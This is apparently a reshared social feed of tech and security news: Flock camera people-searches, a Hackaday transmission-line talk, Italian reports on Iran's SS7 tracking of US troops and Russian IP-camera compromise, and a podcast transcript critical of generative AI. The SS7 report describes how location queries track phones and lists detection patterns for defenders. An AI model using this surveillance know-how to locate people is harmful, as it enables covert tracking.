How Cops Use Flock to Track People, Not Cars


Police departments around the country have used Flock cameras at least hundreds of times to search for specific people, not cars, using searches such as “heavy-set male with a black and white hat,” “person on skateboard,” and “person wearing orange vest and construction hat,” according to data reviewed by 404 Media. Sometimes searches reference a target’s race or signs of their political affiliation.

The searches highlight that while most people associate Flock cameras with scanning license plates and tracking vehicles, some of the cameras are also capable of following the movements of particular people or groups of people. Flock’s nationwide network of cameras lets police officers in one state search for a vehicle across many other states at once; the people searches do a similar thing, typically on a smaller scale, sometimes querying many hundreds of cameras at once. These are called “FreeForm” searches, and allow cops to use Flock’s system as though they would use a search engine, with Flock’s AI and image recognition interpreting what footage and which people are relevant to a police officer’s search.

This post is for subscribers only


Become a member to get access to all content
Subscribe now


reshared this

in reply to Buccia

Hackaday Europe 2026 – Build A Cable Modem For Your Arduino


The media in this post is not displayed to visitors. To view it, please log in.

Even for those of us that are quite technically minded, we spend precious little time thinking about the cables that carry our signals and do all the important work we need them to do on a daily basis. A great deal of theory and engineering goes into making things like telephone lines and HDMI cables work, but we mostly just plug them in and get on with whatever we’re doing.

If this is your experience, you might find the Hackaday Europe talk from [Michael Wiebusch] to be particularly interesting. He dives into transmission line theory from an accessible standpoint, explaining how two disparate signals can go in opposite directions on the very same wire. Then he demonstrates the theory by building a cable modem… well, sort of!

Signal


youtube.com/embed/PdwxXsaaSKM?…

Michael begins his talk by discussing the Telegrapher’s Equation, but only as a fakeout. Given the limited time on offer, he decided a quicker, easier explanation of the physics involved would be more appropriate. Key to this was explaining the difference between cables and transmission lines. To create a true transmission line, by his definition, he explains that there is a necessity to have two conductors that are relatively close together. Such a transmission line is effectively a distributed network of inductances and capacitances all the way down, though often we talk about “lossless” transmission lines for modelling purposes. He also covers the point of coaxial cables, wherein one conductor is wrapped around another to shield a signal from external noise, and to prevent signal from leaking out.
Transmission lines allow signals to pass in opposing directions, much like ripples on a pond will pass through each other, retaining their form. Credit: talk slides
There are several basic facts to remember about transmission lines. They are fundamentally just channels down which EM signals can travel. It’s also good to remember that they delay signals. To a human, the signal may appear to travel instantaneously, but it does take time. This also has other impacts; for example, coax cables are filled with plastic, a material in which the speed of light is roughly 66% of the speed of light in a vacuum.

This slows the rate at which the field of an EM signal can travel to this fundamental limit. [Michael] also notes that transmission lines, as a wave medium, essentially allow waves travelling in different directions to pass each other, much like ripples spreading on the surface of a pond. This is why it’s possible to have bidirectional communication on a single transmission line. It’s also important to terminate a transmission line properly, such that the wave you’re transmitting down it ends where you want it to—at the receiver. Fail to terminate your transmission line, and you’ll have that wave bouncing back and forth which is undesirable for clear transmission.
The coupler allows sending and receiving signals via a single transmission line. Credit: talk slides
[Michael] demonstrates basic transmission line theory by building a sort of cable modem out of an Arduino and some supporting hardware. He notes it’s not really a modem—there is no modulation or demodulation going on. Instead, he’s simply squirting TTL signals into either end of a cable and receiving them on the other end. The “black box” that couples the signals into and out of the transmission line is a simple directional coupler. Built out of resistors and an op-amp, it allows sending a signal down a transmission line, as well as receiving a signal coming the other way. The design works all the way down to DC logic level signals, which let [Michael] use it to send TTL signals up and down 50-ohm and 75-ohm coaxial cables. He notes this has very obvious practical applications where it’s desirable to reduce cable counts when sending signals in multiple directions, relating this directly to his professional work on science experiments.

If you’ve ever wanted to get two devices talking over a single cable in a relatively easy fashion, then [Michael’s] talk may be valuable to you. At the very least, it’s a great way to learn some of the basics of transmission lines and better understand what’s going on when you shoot a signal down a random bit of wire. It’s all good stuff.


hackaday.com/2026/07/16/hackad…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Dalla serie A alla FIFA la Corte di giustizia dell’UE contro il sistema il calcio: “Risponda a giudici ordinari”
@news
eunews.it/2026/07/16/dalla-ser…
I giudici di Lussemburgo emettono due sentenze che accendono i riflettori sull'eccesso di indipendenza del mondo del football, indicando i correttivi e come orientarsi nelle dispute di natura sportiva
Cybersecurity & cyberwarfare ha ricondiviso questo.

AI Act, operazione trasparenza. Perché l’intelligenza artificiale non può più fingersi umana e cosa cambia per startup e imprese. L'analisi di @lastknight e Giuseppe Vaciago

Dal 2 agosto vige l'articolo 50 dell'AI Act europeo e chatbot, avatar e contenuti sintetici dovranno dichiarare la propria natura artificiale. Per imprese e marchi non cambia solo la compliance ma il modo di costruire fiducia. Ripensando il rapporto con clienti e consumatori.

startupitalia.eu/tech/ai-act-u…

@aitech

reshared this

The media in this post is not displayed to visitors. To view it, please log in.

SS7, il protocollo del 1970 che ha tradito i soldati USA: come l’Iran ha tracciato le truppe americane in Medio Oriente


@Informatica (Italy e non Italy)
Un'indagine di Mobile Surveillance Monitor, ripresa dal Financial Times, sostiene che l'Iran abbia sfruttato le debolezze del protocollo SS7 e dati di ad-tech commerciale per


SS7, il protocollo del 1970 che ha tradito i soldati USA: come l’Iran ha tracciato le truppe americane in Medio Oriente


Mentre i missili iraniani cadevano sulle basi americane in Iraq e Bahrain nella primavera del 2026, qualcun altro stava già facendo il lavoro sporco a monte: individuare dove dormivano, mangiavano e lavoravano i soldati statunitensi. Non con un drone o un informatore, ma con un protocollo di telecomunicazioni progettato negli anni ’70 per instradare chiamate tra centrali telefoniche. Un’indagine del progetto no-profit Mobile Surveillance Monitor, ripresa dal Financial Times e da TechCrunch, sostiene che Teheran abbia sfruttato sistematicamente le debolezze di SS7 per tracciare il personale militare USA in Medio Oriente prima e durante il conflitto con Israele e Stati Uniti.

Un protocollo vecchio quanto la Guerra Fredda tecnologica


Signaling System 7 (SS7) è l’infrastruttura di segnalazione che dagli anni ’70 permette agli operatori di rete 2G e 3G di scambiarsi informazioni su instradamento di chiamate, SMS e roaming. Il problema è noto da oltre un decennio agli specialisti di sicurezza delle telecomunicazioni: SS7 si basa su un modello di fiducia reciproca tra operatori che non prevede autenticazione robusta tra le reti. Chiunque abbia accesso — legittimo o comprato sul mercato grigio della sorveglianza — a un nodo SS7 può inviare query di tipo “Send Routing Information” (SRI) per ottenere la cella a cui è agganciato un numero di telefono, ottenendo così una localizzazione approssimativa del dispositivo, ovunque nel mondo, senza che l’utente se ne accorga.

È la stessa classe di debolezza usata in passato da broker di sorveglianza commerciale e da servizi di intelligence per intercettare SMS di autenticazione a due fattori o localizzare dissidenti. Ciò che rende il caso iraniano rilevante non è la tecnica in sé, già documentata, ma la scala e il tempismo: un uso operativo in tempo di guerra, contro obiettivi militari di una potenza nucleare.

La scoperta: un’impennata di query SS7 nel Golfo


Gary Miller, ricercatore che ha fondato Mobile Surveillance Monitor e collabora con il Citizen Lab dell’Università di Toronto, ha rilevato un’impennata anomala di “SS7 ping” — richieste ripetute di localizzazione — su reti di telecomunicazione di diversi paesi mediorientali. L’attività sarebbe iniziata a ridosso dell’operazione aerea congiunta USA-Israele contro i siti nucleari iraniani, per poi intensificarsi nei primi giorni del conflitto, quando l’Iran ha lanciato missili e droni contro le posizioni americane nella regione.

I segnali intercettati indicherebbero un interesse mirato per numeri associati a basi militari e hotel utilizzati da personale e contractor statunitensi in Iraq, Bahrain e altri paesi della regione — non una raccolta indiscriminata, ma query concentrate su specifiche fasce numeriche e reti locali note per essere frequentate da soggetti occidentali.

Non solo SS7: l’ad-tech come arma di sorveglianza


Il report segnala un secondo livello di raccolta, complementare a SS7: l’uso di tecnologie pubblicitarie commerciali (l’ecosistema RTB, “real-time bidding”) per identificare smartphone tramite advertising ID (IDFA/GAID) e correlarli, attraverso data broker, a posizioni geografiche precise. È la stessa superficie di rischio già segnalata da anni riguardo alla possibilità per chiunque compri dataset pubblicitari di ricostruire pattern di movimento di individui specifici — qui però applicata, secondo i ricercatori, a fini di targeting militare in un teatro di guerra attivo.

La combinazione delle due tecniche — segnalazione telefonica di rete e dati pubblicitari commerciali — rappresenta un salto di sofisticazione rispetto alle classiche operazioni SS7 isolate: un attore statale che integra fonti SIGINT tradizionali con l’enorme mole di dati commerciali normalmente destinata al marketing.

Timeline essenziale


  • Fine febbraio 2026: primo aumento rilevato delle query SS7 sospette, in coincidenza con l’avvio della campagna aerea USA-Israele contro l’Iran.
  • Marzo-aprile 2026: intensificazione del tracciamento durante lo scambio di attacchi missilistici e con droni contro le posizioni statunitensi in Iraq e Bahrain.
  • 14 luglio 2026: pubblicazione del report da parte del Financial Times, ripreso da TechCrunch, Security Boulevard e altre testate di settore.


Due righe per i difensori


Per chi si occupa di sicurezza delle telecomunicazioni e di protezione del personale ad alto rischio (militari, diplomatici, giornalisti in zone di conflitto, dirigenti esposti), il caso ribadisce alcuni punti che il settore conosce ma fatica a far diventare prassi diffusa:

  • Le difese SS7 lato operatore (firewall di segnalazione, filtri su messaggi SRI-SM/PSI provenienti da reti non attendibili) restano disomogenee a livello globale, specialmente in aree di conflitto dove la cooperazione tra operatori è debole.
  • Il personale ad alto rischio dovrebbe evitare la SIM del proprio operatore domestico quando si muove in teatri sensibili, preferendo dispositivi dedicati, SIM locali “pulite” o soluzioni di comunicazione satellitare/crittografata che non transitano su rete 2G/3G tradizionale.
  • La disattivazione del roaming 2G/3G e l’uso forzato di reti 4G/5G con autenticazione più robusta riduce, senza eliminarla, l’esposizione a query SS7 (il 4G usa Diameter, comunque non immune da abusi simili).
  • Gli advertising ID dei dispositivi militari o di personale sensibile dovrebbero essere disattivati o randomizzati sistematicamente, e le app non essenziali rimosse prima di operazioni in teatri a rischio.

Il caso si inserisce in un pattern più ampio: dal 2014 a oggi, ricercatori indipendenti e vendor di sicurezza mobile hanno ripetutamente dimostrato che SS7 resta uno dei punti ciechi più sottovalutati della sicurezza nazionale, proprio perché la sua debolezza non risiede in un bug patchabile ma nell’architettura stessa di fiducia tra operatori, difficile da riformare su scala globale in tempi brevi.

Indicatori e pattern di rilevamento


Non essendo un malware ma un abuso di protocollo, non esistono IoC nel senso classico. I pattern che i team SOC delle telco e i CERT dovrebbero monitorare includono:

# Pattern di rilevamento abuso SS7 (indicativi, non esaustivi)
- Volume anomalo di messaggi SRI / SRI-SM verso uno stesso MSISDN o range di MSISDN
  in un intervallo di tempo ristretto (query ripetute = tentativo di tracciamento continuo)
- Richieste PSI (Provide Subscriber Info) o ATI (Any Time Interrogation) originate
  da Global Title esterni non associati a roaming legittimo dell'abbonato
- Origine dei messaggi SS7 da reti GT (Global Title) storicamente associate
  a broker di sorveglianza o a operatori "shell" con traffico legittimo minimo
- Correlazione temporale tra query SS7 e attivazione di advertising ID
  dello stesso dispositivo in piattaforme RTB di terze parti
- Assenza di firewall SS7/SIGTRAN conforme alle raccomandazioni GSMA FS.11 e FS.19

La GSMA pubblica da anni linee guida (FS.11, FS.19) per il filtraggio del traffico di segnalazione: la loro adozione disomogenea, soprattutto fuori dai mercati occidentali, resta il vero tallone d’Achille che un attore statale come l’Iran può — e a quanto pare sa — sfruttare con costi minimi e attribuzione tutt’altro che scontata.

Zoom, scoperta una vulnerabilità che apre le porte all’account takeover su Windows


@Informatica (Italy e non Italy)
È stata corretta una vulnerabilità critica nel client Windows di Zoom che potrebbe consentire a un attaccante non autenticato di violare gli account via rete. Coinvolti anche VDI Client e Meeting SDK: ecco impatti, superficie di attacco e

The media in this post is not displayed to visitors. To view it, please log in.

Le telecamere spia di Mosca: come l’intelligence russa sorveglia le rotte NATO verso l’Ucraina


@Informatica (Italy e non Italy)
AIVD e MIVD, le agenzie di intelligence olandesi, hanno rivelato una campagna russa che sfrutta telecamere IP e videocitofoni smart con password di default per monitorare in tempo reale il trasporto di aiuti militari verso


Le telecamere spia di Mosca: come l’intelligence russa sorveglia le rotte NATO verso l’Ucraina


Non servono droni, satelliti spia o infiltrati sul campo: bastano un videocitofono smart lasciato con la password di fabbrica e una connessione a Internet. Le agenzie di intelligence olandesi AIVD (General Intelligence and Security Service) e MIVD (Military Intelligence and Security Service) hanno rivelato che hacker legati allo stato russo hanno compromesso migliaia di telecamere IP e sistemi di videocitofonia lungo le rotte logistiche usate dalla NATO e dall’Ucraina per il trasporto di aiuti militari occidentali, trasformando dispositivi domestici e commerciali in una rete di sorveglianza capillare sul territorio europeo.

Un’operazione di OSINT armata su scala industriale


Secondo quanto riportato inizialmente dal Telegraph e ripreso da Kyiv Post, Pravda e diverse testate di settore, l’obiettivo dell’operazione russa era raccogliere intelligence in tempo reale sui tipi e sui volumi di armamenti inviati a Kyiv dagli alleati occidentali. A differenza delle tradizionali tecniche di sorveglianza satellitare o tramite drone, questa campagna sfrutta dispositivi IoT di consumo già presenti sul territorio: telecamere di sicurezza, citofoni smart e sistemi di videosorveglianza commerciale posizionati, spesso per puro caso logistico, lungo strade e valichi utilizzati per i convogli di aiuti militari.

Le due agenzie olandesi hanno confermato che un numero limitato di telecamere situate direttamente lungo le rotte logistiche nei Paesi Bassi risultava compromesso, e che le organizzazioni proprietarie dei dispositivi sono state avvisate per adottare contromisure. Il fenomeno, però, non si limita al territorio olandese: secondo l’advisory, la campagna ha interessato più Paesi membri della NATO e la stessa Ucraina, delineando un quadro di sorveglianza distribuita su tutta la catena di rifornimento occidentale verso il fronte.

Le tecniche: niente exploit sofisticati, solo superficie d’attacco enorme


Il dato più inquietante emerso dall’advisory congiunto non riguarda la sofisticazione tecnica — che qui è minima — ma la scala e la facilità dell’operazione. “Quando una telecamera IP viene identificata, un attaccante può provare ad accedervi via Internet: spesso è relativamente facile, perché molte telecamere connesse alla rete sono insufficientemente protette”, si legge nel rapporto delle agenzie olandesi. Gli operatori russi si sono affidati sistematicamente a password di default lasciate dal produttore, firmware obsoleti e mai aggiornati, e configurazioni di fabbrica mai modificate dagli utenti finali.

Molti dei dispositivi compromessi sono telecamere IP economiche di produzione cinese, in particolare modelli Hikvision e Dahua — marchi già oggetto in passato di segnalazioni per vulnerabilità di sicurezza e per preoccupazioni geopolitiche legate al loro utilizzo in infrastrutture sensibili. Una volta ottenuto l’accesso, gli aggressori hanno impiegato software di riconoscimento immagini per analizzare automaticamente i flussi video alla ricerca di veicoli militari e per identificarne il carico, automatizzando quello che altrimenti avrebbe richiesto osservazione umana costante.

Il contesto più ampio: la guerra ibrida contro la logistica occidentale


Questa campagna di compromissione delle telecamere si inserisce in un pattern più ampio di iniziative russe volte a mappare, disturbare o neutralizzare i vantaggi tecnologici che sostengono lo sforzo bellico ucraino. Un’inchiesta congiunta di The Insider, Der Spiegel e Le Monde, citata da Kyiv Post, ha rivelato che Russia e Cina hanno discusso segretamente, nell’ambito del terzo Forum di cooperazione tecnico-militare Cina-Russia tenutosi a Guangzhou, piani per neutralizzare la costellazione satellitare Starlink, da cui l’Ucraina dipende fortemente per comunicazioni e intelligence in tempo reale sul campo di battaglia.

Le slide trapelate, attribuite alla China Aerospace Science and Technology Corporation (CASC), delineavano un approccio multi-dominio contro Starlink: mezzi fisici per distruggere satelliti in orbita bassa, jamming elettromagnetico dei segnali e operazioni cyber pensate per caricare payload malevoli attraverso i terminali utente. Il documento proponeva inoltre una vera e propria “alleanza di sicurezza” tra Pechino e Mosca, con condivisione di intelligence e collaborazione su tecnologie chiave per contrastare il dominio strategico statunitense nello spazio.

Letta in questo contesto, la compromissione delle telecamere IP appare come un tassello a basso costo ma ad alto valore informativo di una strategia più ampia: se Starlink rappresenta il bersaglio ad alta quota della guerra ibrida russa, le migliaia di dispositivi IoT scarsamente protetti lungo le rotte logistiche europee rappresentano il fronte a bassa quota, silenzioso e diffuso, della stessa battaglia per la superiorità informativa.

Due righe pratiche per i difensori


Per i team di sicurezza, in particolare in ambito enterprise, logistico e delle infrastrutture critiche, questa vicenda è un promemoria brutale di quanto i dispositivi IoT di consumo restino l’anello debole della catena, specialmente quando dislocati in prossimità di asset sensibili o rotte strategiche. Le raccomandazioni delle agenzie olandesi, applicabili anche al contesto italiano ed europeo in generale, si concentrano su igiene di base della sicurezza IoT piuttosto che su contromisure avanzate:

  • Cambiare immediatamente le password di default su tutte le telecamere IP, videocitofoni smart e dispositivi di videosorveglianza connessi a Internet.
  • Aggiornare il firmware dei dispositivi IoT con regolarità, verificando la disponibilità di patch presso il produttore.
  • Segmentare la rete in modo che le telecamere IP non abbiano accesso diretto a Internet né alla rete aziendale principale, utilizzando VLAN dedicate.
  • Per le organizzazioni logistiche che operano lungo rotte sensibili, effettuare un censimento dei dispositivi IoT esposti pubblicamente tramite piattaforme come Shodan o Censys.
  • Segnalare alle autorità nazionali competenti (in Italia, CSIRT-Italia) eventuali dispositivi sospetti o comportamenti anomali di rete rilevati su telecamere aziendali.
  • Valutare con attenzione l’adozione di dispositivi IoT di produttori con precedenti riscontrati di vulnerabilità sistemiche, specialmente in contesti a rischio geopolitico elevato.

La vicenda dimostra ancora una volta che l’intelligence russa non ha bisogno di zero-day costosi o di infrastrutture offensive sofisticate quando l’anello debole è semplicemente la scarsa igiene di sicurezza di milioni di dispositivi IoT di consumo lasciati esposti online con le impostazioni di fabbrica. È una lezione che vale ben oltre il contesto bellico ucraino, e che riguarda direttamente chiunque gestisca infrastrutture di videosorveglianza connesse in rete.


Cybersecurity & cyberwarfare ha ricondiviso questo.

DK 10x39 - Dissing

"Gli informatici, o almeno questo informatico, hanno passato almeno gli ultimi quarant'anni a cercare di convincere il mercato di portare una competenza che va al di là del sapere usare il tal programma. Battaglia persa, sia chiaro. Basta guardare le offerte di lavoro oggi, che nella parte "competenze" sono solo una litania di nomi di prodotti.

E non parliamo delle certificazioni, che sono quasi universalmente certificazioni di prodotto. Prima eri un tecnico di rete Novell, ora sei un tecnico di rete Google o AWS, non cambia niente.

Nel migliore dei casi, certo, una persona con reali competenze di networking può riversarle in qualsiasi framework commerciale il momento richieda. Ma questo lo rende, agli occhi del datore di lavoro, più appetibile di qualcuno che conosca solo quello specifico framework? Non credo.

E poi, umanamente, perché spendere tempo e fatica a costruire una professionalità di settore generale e commercialmente agnostica, se poi comunque si viene pagati solo per la competenza di prodotto?

E il problema di scambiare la competenza professionale con la competenza di prodotto è che il tempo passa, i prodotti cambiano, e la tua competenza, quella con cui sei partito e quella che ti sei fatto sul campo, vale sempre zero. Se proprio sei fortunato, la ditta ti paga la ricertificazione, tanto è deducibile e costa sempre meno che aumentarti lo stipendio."

@DataKnightmare #dataknightmarelalgoritmicoepolitico #dataknightmare_it #llm #ai #aislop

dk.dataknightmare.eu/dk10x39-d…


DK10x39 - Dissing


Ascolta l'episodio su Spreaker.com

Prima chiariamo una cosa, e poi rispondiamo a Alex Raccuglia, ok?

Allora, ecco la cosa da chiarire. Qualcuno ha sentito l'ultimo episodio o letto il post (visto che escono in contemporanea) e ne ha concluso che io avevo attaccato Stefano Quintarelli.

Ora, io sono bello, simpatico e intelligente, ma anche io ho i miei limiti. Uno di questi è che quando attacco qualcuno sono generalmente in grado di intendere e di volere, quindi il fatto che non ricordassi di averlo fatto, o di avere mai avuto un motivo per farlo, mi ha momentaneamente spiazzato.

Vediamo il passaggio incriminato:

Mi dispiace vedere una simile quantità di stronzate pubblicata sul Sole, sarà che ci ha lavorato Quintarelli. Quest'ultimo barrage di stronzate non vale nemmeno il fiato per chiamarle per nome. Ma purtroppo, come tutte le stronzate che girano attorno all'Intelligenza Artificiale, fanno un sacco bene alla carriera.


Allora, un minimo di contesto. L'episodio commentava un'intervista al prof. Sorgner uscita sul Sole 24Ore a firma di Roberto Manzocco.

Dire che avevo forti riserve nei confronti delle tesi sostenute da Sorgner, che è fautore di una cosa che chiama Euro-Transumanesimo, sarebbe un eufemismo di livello olimpico. Il paragrafo appena che ho riletto dovrebbe bastare come esempio.
intarelli. E ammetto che rileggendolo con attenzione, è decisamente ambiguo.

La frase "Mi dispiace vedere una simile quantità di stronzate pubblicata sul Sole, sarà che ci ha lavorato Quintarelli." può essere interpretata in due modi:

  1. il Sole era un giornale serio, poi ci ha lavorato Quintarelli e quindi ora è pieno di stronzate;
  2. Quintarelli ha lavorato al Sole, che quindi è un giornale serio, e mi dispiace leggerci queste stronzate.

Ora, chi mi conosce sa esattamente come andava letta. Ma rimane il fatto che, essendo io marginalmente meno famoso di Taylor Swift, la frase è ambigua. Questo fatto è colpa mia, e me ne scuso.

La lettura corretta è: Il Sole è il giornale dove ha lavorato Quintarelli, questo fatto lo rende per me è un giornale serio, mi dispiace leggerci certe stronzate.

Quindi no, non attaccavo Quintarelli. E giusto per non lasciare dubbi non ce l'ho nemmeno con Manzocco. Il pezzo era un'intervista a Sorgner per l'uscita del suo libro, e l'intervista faceva chiaramente capire i valori e le motivazioni dell'intervistato, quindi Manzocco ha fatto un lavoro egregio.

OK. Adesso metà di voi può risotterrare l'ascia di guerra.

All'altra metà, vorrei pacatamente far sapere che neanche Alex Raccuglia attaccava me. Ringrazio Marco "Cassandra" Calamari che ha voluto farmi sapere che gli rispondeva ma che non voleva "bruciarmi", ma veramente, non c'è problema. Peraltro, il pezzo di Cassandra mi è piaciuto, e mi è piaciuto anche il vlog di Alex.

Ora, io capisco che nel suo ultimo episodio Alex è agli antipodi delle mie opinioni. Ma considerato che le esprime in un modo civile, non vedo il problema. Non è che siamo qui per fare la guerra santa.

Se non avete seguito, il vlog/podcast di Alex si chiama "TechnoPillz", tutto attaccato con l'acca e la zeta, e l'episodio si chiama "Lettera aperta a Walter Vannini".

Ora, sul canale ho letto un sacco di critiche, alcune poste meglio di altre, e un sacco di astio non necessario.
Voglio dire, se Alex riesce a fare discorsi di senso compiuto mentre guida per andare in ufficio, dove sta il problema?

Il valore di un argomento sta nell'argomento, non nella modalità di presentazione; non è che ha più valore se lo declami in giacca e cravatta da un podio e meno se lo esterni in bermuda e maglietta mentre ti fai una birra. (Io, per dire, ho le migliori idee per gli episodi mentre mi faccio la doccia.)

E l'argomento di Alex non è da trascurare. Cosa ha detto? Questo:

  1. che lui da videomaker l'Intelligenza Artificiale generativa la usa eccome,con risultati che lo soddisfano,
  2. che con l'Intelligenza Artificiale riesce a affrontare progetti che, per limiti di risorse e budget, non riuscirebbe a fare altrimenti,
  3. che secondo lui non bisogna buttare il bambino con l'acqua sporca
  4. e che finché rimane economicamente percorribile, secondo lui non si torna indietro.

Ora, a parte che Alex è un amico, queste non sono solo opinioni legittime, sono anche condivise da molti.

Questo non significa che io non ci veda dei problemi. Vediamo di andare in ordine.

Allora. "Per me funziona" è un argomento cardine del soluzionismo da Big Tech, e è sempre un argomento difficile, e ancora di più per qualcosa come l'Intelligenza Artificiale generativa, venduta come panacea per tutto ma senza alcuna garanzia del produttore, ci mancherebbe.

Siamo quindi di fronte a una tecnologia della quale gli utenti stessi sono chiamati a fornire (gratuitamente, ca va sans dire) i casi d'uso.

C'è poi il problema che l'Intelligenza Artificiale generativa usata nella produzione di video non è la stessa cosa di quella usata nella produzione di testi, ma diciamo che sorvoliamo, sennò non ne usciamo più.

Quindi, Alex fa i video con l'aiuto della IA generativa, gli vengono bene e ci trova un vantaggio. Bene. Io il suo corto l'ho visto, ma anche se è tenero e carino, perfino io riesco a vedere che ci sono dei problemi di continuity, di cose che cambiano da una inquadratura all'altra senza motivo apparente. Quindi ok, interesse, ma il mio entusiasmo è limitato. Diciamo che si alza il livello minimo accettabile, ma non è che io con la Intelligenza Artificiale generativa divento Spielberg.

Ma diciamo che è un problema che si risolve con la prossima versione, un altro classico del soluzionismo da poveri di spirito propagandato da Big Tech come Vangelo.

Torniamo a noi. Se i risultati che ottieni con l'Intelligenza Artificiale sono soddisfacenti, e se addirittura ti permettono di affrontare progetti prima proibitivi, vuol dire che davvero l'Intelligenza Artificiale ti rende più produttivo.

Ottimo. E questa produttività si traduce in qualcosa di tangibile nel tuo stipendio o se la ingloba il datore di lavoro perché stare al passo col progresso è qualcosa che devi fare a spese tue?

Perché il punto non è l'Intelligenza Artificiale, il punto è che dagli anni '80 del Novecento, la produttività individuale è cresciuta continuamente, ma i salari sono rimasti fermi, al punto che un "buono stipendio" oggi è, in termini reali, inferiore a quello che prendevo nel 1990 come neolaureato al primo impiego.

Quindi OK, l'Intelligenza Artificiale ti rende più produttivo, e quindi produci più lavoro per lo stesso stipendio. Io non lo vedo come un passo avanti.

E non siamo fuori tema. Qual è il problema da un miliardo di dollari che la Intelligenza Artificiale dovrebbe risolvere? Te lo dico io: si chiama stipendi.
Da quando è uscito chatGPT il coro è stato unanime: siamo di fronte a una tecnologia che sostituirà i lavoratori. Lasciamo stare che la promessa non sia nemmeno lontanamente vicina all'essere raggiunta. Il punto è che i datori di lavoro ci credono perché sanno benissimo che anche se non è letteralmente vero, tutto quello che riduce il potere contrattuale di chi lavora è bene accetto, anche se costa di più.

Quindi tu stai dicendo al tuo datore di lavoro che puoi rendere di più a parità di stipendio. Che già secondo me è una cosa problematica, ma lui non capisce solo questo. Perché se da videomaker diventi, diciamo, "regista di Intelligenze Artificiali", perfino un manager riesce a capire che per scrivere prompt non servi tu, ma va bene chiunque.

Quindi come sempre il problema non è l'Intelligenza Artificiale generativa in sé, che è solo tecnologia, ma gli effetti che ha.
E gli effetti che descrivi sono che tu perdi potere contrattuale nei confronti del tuo datore di lavoro, e allo stesso tempo la tua professionalità viene sminuita, perché stai dimostrando che tutte le competenze e le capacità che facevano del tuo lavoro il tuo lavoro si riducono a tirare i dati con una o più Intelligenza Artificiale generative.

Dici giustamente che con l'Intelligenza Artificiale generativa puoi affrontare progetti che prima, per problemi di budget e risorse, sarebbero stati impercorribili.

Bene, ma se questo non si traduce in un incremento del tuo valore, non riesco a vedere in che senso sia una cosa positiva.

Non sei un radiologo che, se gli dai in mano un impianto per Risonanza Magnetica, riesce a diagnosticare di più e meglio, restando comunque radiologo.

Sei un videomaker che passa dal vendere la propria competenza di inquadrature, tempi scenici, luce, colore, sceneggiatura e regia, a qualcuno che si mette sullo stesso piano del proverbiale "cuggino che capisce il computer".

Gli informatici, o almeno questo informatico, hanno passati almeno gli ultimi quarant'anni a cercare di convincere il mercato di portare una competenza che va al di là del sapere usare il tal programma. Battaglia persa, sia chiaro. Basta guardare le offerte di lavoro oggi, che nella parte "competenze" sono solo una litania di nomi di prodotti.

E non parliamo delle certificazioni, che sono quasi universalmente certificazioni di prodotto. Prima eri un tecnico di rete Novell, ora sei un tecnico di rete Google o AWS, non cambia niente.

Nel migliore dei casi, certo, una persona con reali competenze di networking può riversarle in qualsiasi framework commerciale il momento richieda. Ma questo lo rende, agli occhi del datore di lavoro, più appetibile di qualcuno che conosca solo quello specifico framework? Non credo.

E poi, umanamente, perché spendere tempo e fatica a costruire una professionalità di settore generale e commercialmente agnostica, se poi comunque si viene pagati solo per la competenza di prodotto?

E il problema di scambiare la competenza professionale con la competenza di prodotto è che il tempo passa, i prodotti cambiano, e la tua competenza, quella con cui sei partito e quella che ti sei fatto sul campo, vale sempre zero. Se proprio sei fortunato, la ditta ti paga la ricertificazione, tanto è deducibile e costa sempre meno che aumentarti lo stipendio.

Ancora una cosa. Dici, giustamente, che il fattore "costo" ha il suo peso. Noi sappiamo già oggi che, per generare profitti, i prodotti di Intelligenza Artificiale generativa devono aumentare i propri costi di almeno 20 volte.

Quando questo succederà, le aziende si troveranno a dover ridurre i costi. Io mi faccio la domanda: cosa taglieranno? Perché se succede domani, tagliano i contratti con openAI e Anthropic.
Che infatti stanno facendo carte false per poter continuare a operare con perdite disastrose per almeno un altro paio d'anni.
Ecco, diciamo che fra due anni il venture capital si inaridisce e gli AI bro moltiplicano i prezzi per venti.

Fra due anni, il tuo datore di lavoro cosa taglierà:

  • lo strumento con cui ha potuto aumentare i guadagni, raggiungere clienti e progetti che non avrebbe potuto raggiungere, e porsi sul mercato come all'avanguardia della tecnologia produttiva...
  • o un lavoratore il cui costo non è più giustificato, e che può essere cambiato senza influire sull'immagine della ditta e sulle sue capacità produttive?

Chiedo per un amico...

pausa

Mica è ancora finita.

Il costo alla pompa non è la sola cosa di cui dobbiamo preoccuparci per valutare l'impatto sociale di una tecnologia, non dopo tutto quello che abbiamo imparato in questi anni.

No sappiamo che la filiera di una cosiddetta Intelligenza Artificiale generativa, sia testuale che grafica, è un disastro completo.

Partiamo dall'inizio. Si parte dal furto generalizzato di proprietà intellettuale a esclusivo vantaggio di oligopoli privati. Si procede con lo sfruttamento, in condizioni praticamente schiavistiche, di lavoratori in varie fasi del cosiddetto "controllo di qualità". Si va dall'Africa dove ai lavoratori viene chiesto di "scremare" a cottimo contenuti "indesiderati" (si sentono le virgolette?), con costi terrificanti in termini di salute mentale, fino a Europa e Stati Uniti dove, sempre a cottimo, i lavoratori devono fungere da "correttori di bozze" per l'Intelligenza Artificiale generativa.

Si tratta di lavori che risolvono problemi creati dalla stessa industria dell'Intelligenza Artificiale generativa, che ha consapevolmente scelto di raccogliere dati in modo indiscriminato, con costi esorbitanti di raccolta e di processo.

Perché?

Perché questo supporta la propria mitologia di grandezza, di un'industria che opera su scale fino ad oggi inimmaginabili per affrontare problemi fino ad oggi inimmaginabili, nonostante il sillogismo sia stato provato falso sin dall'inizio.

Si tratta di lavori senza senso, senza prospettiva, senza alcun valore professionale o culturale. Puro teatro a esclusivo vantaggio dei deliri millenaristici di una casta di oligarchi fascistoidi e buffoni.

Naturalmente il pensiero corrente promuove l'idea che sticazzi i lavoratori perché chi ha un lavoro di merda è colpa sua, non esistono poveracci stipendiati, solo founder milionari in momentanea difficoltà, e naturalmente l'Intelligenza Artificiale generativa li porterà tutti in auge.

Manco tutti quelli che ripetono sta fesseria girassero in Rolls, ma non importa, l'importante è mettere i poveri contro i più poveri, così lasciano in pacev i ricchi; è il trucco più vecchio del mondo.

Rimane ancora il fatto che i costi energetici e ambientali dell'industria dell'Intelligenza Artificiale generativa sono ancora peggio dei costi sociali.

Google ha appena annunciato di avere mancato i propri obiettivi di riduzione dell'impatto ambientale. Di nuovo. L'industria della Intelligenza Artificiale generativa non è solo spaventosamente idrovora e energivora: lo è in modo stupido e criminale.

Stupido perché gli AI bro continuano a vendere l'idea di "Dio nel computer" quando hanno in mano solo una tecnologia con qualche utilità marginale a una scala infinitamente minore di quella necessaria al mantenimento del loro carrozzone.

